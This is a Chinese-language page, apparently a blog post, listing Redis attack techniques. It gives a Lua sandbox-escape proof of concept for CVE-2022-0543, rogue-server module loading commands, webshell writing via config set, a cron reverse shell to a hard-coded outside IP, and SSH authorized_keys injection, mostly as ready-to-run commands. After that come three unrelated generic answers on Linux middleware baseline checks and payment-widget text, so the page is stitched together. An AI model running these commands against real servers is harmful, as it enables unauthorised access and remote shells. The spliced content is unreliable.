中间件漏洞

一.Redis

1. 01沙箱绕过RCE-CVE-2022-0543

Poc :执行id命令

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

02.

未授权访问 - CNVD - 2019 - 21763

由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块,在未授权访问的情况下使被攻击服务器加载恶意.so 文件,从而实现远程代码执行。

https://github.com/vulhub/redis-rogue-getshell

python redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 8888 -RedisModulesSDK/exp.so -"id"

03.

未授权访问:CNVD-2015-07557

-Webshell需得到Web路径

利用条件:Web目录权限可读写

config set dir /tmp            #设置WEB写入目录

config set dbfilename 1.php    #设置写入文件名

set test "<?php phpinfo();?>"  #设置写入文件代码

bgsave                         #保存执行

save                           #保存执行

注意:部分没目录权限读写权限               

-写定时任务反弹shell

利用条件:Redis服务使用ROOT账号启动,安全模式protected-mode处于关闭状态

config set dir /var/spool/cron

set yy "\n\n\n* * * * * bash -i >& /dev/tcp/47.94.236.117/5555 0>&1\n\n\n"

config set dbfilename x

save

注意:

centos会忽略乱码去执行格式正确的任务计划 

而ubuntu并不会忽略这些乱码,所以导致命令执行失败

-写入Linux ssh-key公钥

利用条件:Redis服务使用ROOT账号启动,安全模式protected-mode处于关闭状态

允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器

ssh-keygen -t rsa

cd /root/.ssh/

(echo -"\n\n"; cat id_rsa.pub; echo -"\n\n") > key.txt

cat key.txt | redis-cli -h 目标IP -x set xxx

//以上步骤在自己的攻击机器上执行

config set dir /root/.ssh/

config set dbfilename authorized_keys

save

cd /root/.ssh/

ssh -i id_rsa root@目标IP

-自动化项目:

https://github.com/n0b0dyCN/redis-rogue-server

python redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost IP

### 回答1: 在Linux系统中,中间件基线核查是一项重要的安全措施。中间件是指在操作系统与应用程序之间提供支持服务和功能的软件组件,包括数据库、应用服务器、Web服务器等。中间件基线核查旨在确保中间件组件的配置、权限、补丁等是否符合安全标准,以减少系统中间件漏洞和潜在威胁。 首先,中间件基线核查会检查中间件软件是否按照最佳实践配置。这包括审查配置文件、监听端口和服务信息是否合理,是否存在默认用户名和密码等安全隐患。对于应用服务器、数据库等常见中间件,还需要检查是否启用了安全功能,如SSL加密传输、访问控制等。 其次,中间件基线核查还会验证中间件软件是否安装了最新的安全补丁。通过检查系统补丁和更新的情况,可以保证中间件软件没有已知漏洞。同时,对于自定义的中间件组件,还需要进行代码审查或使用安全扫描工具来检测潜在的安全问题。 此外,中间件基线核查还重点关注访问控制和权限配置。确保只有授权用户或系统可以访问中间件组件,避免未经授权的访问。同时,还要评估中间件服务账户的权限设置,避免过高的权限导致的潜在风险。 最后,中间件基线核查需要进行定期检查和更新。由于中间件软件和系统环境都在不断更新,安全威胁也在不断演进,定期的基线核查可以及时发现和解决存在的安全问题,保障系统的安全稳定运行。 总之,中间件基线核查是确保Linux系统中间件安全的一项重要措施,通过配置检查、补丁验证、访问控制和权限配置等手段,可以有效减少中间件组件的安全风险。定期的基线核查是保障系统安全性的必要环节。 ### 回答2: Linux 中间件基线核查是一种对Linux操作系统中安装的中间件进行检查和评估的过程。中间件是指在操作系统和应用程序之间提供服务的软件组件。通过对中间件基线的核查,可以确保中间件的准确性、完整性和安全性,以保护系统免受潜在的漏洞和攻击。 中间件基线核查的过程包括以下几个方面: 1. 验证中间件的版本和配置。核查中间件的版本是否是最新的,并确保其配置符合最佳实践。 2. 检查中间件的补丁和更新。核查中间件是否已经安装了最新的安全补丁和更新程序,以修复已知的漏洞。 3. 检查中间件的安全设置。核查中间件的安全设置,包括访问控制、密码策略、日志设置等,以确保系统的安全性能。 4. 检查中间件的运行状态。核查中间件是否在正常运行,并检查其日志和错误信息,以便及时检测和解决潜在问题。 5. 检查中间件的权限和访问控制。核查中间件的文件和目录访问权限是否正确设置,并确保只有授权的用户可以访问和修改中间件的配置文件和数据文件。 通过进行中间件基线核查,可以识别和解决潜在的风险和问题,提高系统的安全性和稳定性。同时,定期进行中间件基线核查也是一种良好的安全实践,以保持系统的可靠性和可用性。 ### 回答3: Linux 中间件基线核查是指对Linux操作系统上安装的各类中间件软件进行一系列检查和验证,以确保其安全性和合规性的过程。 首先,对于中间件软件的安装,需要确认软件来源是否可靠、是否为最新版本,并验证其完整性。通过比对所安装中间件软件的文件哈希值、数字签名等方式,可以确保软件未被篡改或感染恶意代码。 接着,针对中间件软件的配置,需要检查是否存在缺省密码、未禁用的服务和端口等潜在的安全隐患。例如,禁用或删除中间件软件中不必要的插件和组件,以减少系统攻击面。 此外,还需要对中间件软件的访问权限进行限制和控制。通过设置合理的访问权限,包括文件权限、网络通信权限等,可以防止未授权人员对中间件软件进行非法访问和操作。 在中间件软件的更新和升级方面,需要确保及时应用厂商发布的安全补丁和更新,以修复已知漏洞和提升系统的安全性。同时,对于自行开发或定制的中间件软件,也需要加强源代码的安全评估和审计工作。 最后,应建立健全的日志记录和监控机制,对中间件软件的运行状态和安全事件进行实时监测和分析。及时发现异常行为和安全漏洞,可以采取相应的应对措施,避免可能的安全事故和数据泄露。 总之,Linux 中间件基线核查是一个全面审查和验证中间件软件安全性和合规性的过程,通过严密的检查、配置和监控,提高系统的抵御能力,保障应用系统的稳定运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值